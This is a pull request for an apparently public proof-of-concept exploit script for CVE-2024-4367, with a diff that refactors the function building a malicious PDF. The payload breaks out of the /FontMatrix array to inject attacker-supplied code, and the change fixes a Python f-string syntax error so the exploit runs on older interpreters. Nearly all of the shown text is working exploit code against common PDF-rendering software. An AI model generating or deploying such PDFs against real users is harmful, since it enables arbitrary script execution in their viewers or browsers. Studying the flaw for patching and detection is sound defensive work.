### PR TITLE
resolved f-string backslash SyntaxError for backwards compatibility

### DIFF
--- a/CVE-2024-4367.py
+++ b/CVE-2024-4367.py
@@ -1,7 +1,11 @@
+#!/usr/bin/env python3
+
 import sys
 
-
 def generate_payload(payload):
+    backslash_char = "\\"
+    fmt_payload = payload.replace('(', '\\(').replace(')', '\\)')
+    font_matrix = f"/FontMatrix [0.1 0 0 0.1 0 (1{backslash_char});\n" + f"{fmt_payload}" + "\n//)]"
     return f"""
 %PDF-1.4
 %DUMMY
@@ -31,7 +35,7 @@ endobj
 /BaseFont/PAXEKO+SourceSansPro-Bold
 /LastChar 102
 /Encoding/WinAnsiEncoding
-/FontMatrix [0.1 0 0 0.1 0 (1\\);\n{payload.replace('(', '\\(').replace(')', '\\)')}\n//)]
+{font_matrix}
 /Subtype/Type1
 /FirstChar 65
 /FontDescriptor 9 0 R


### PR DESCRIPTION
resolved f-string backslash SyntaxError for backwards compatibility < Python3.12 support

Resolves: https://github.com/LOURC0D3/CVE-2024-4367-PoC/issues/5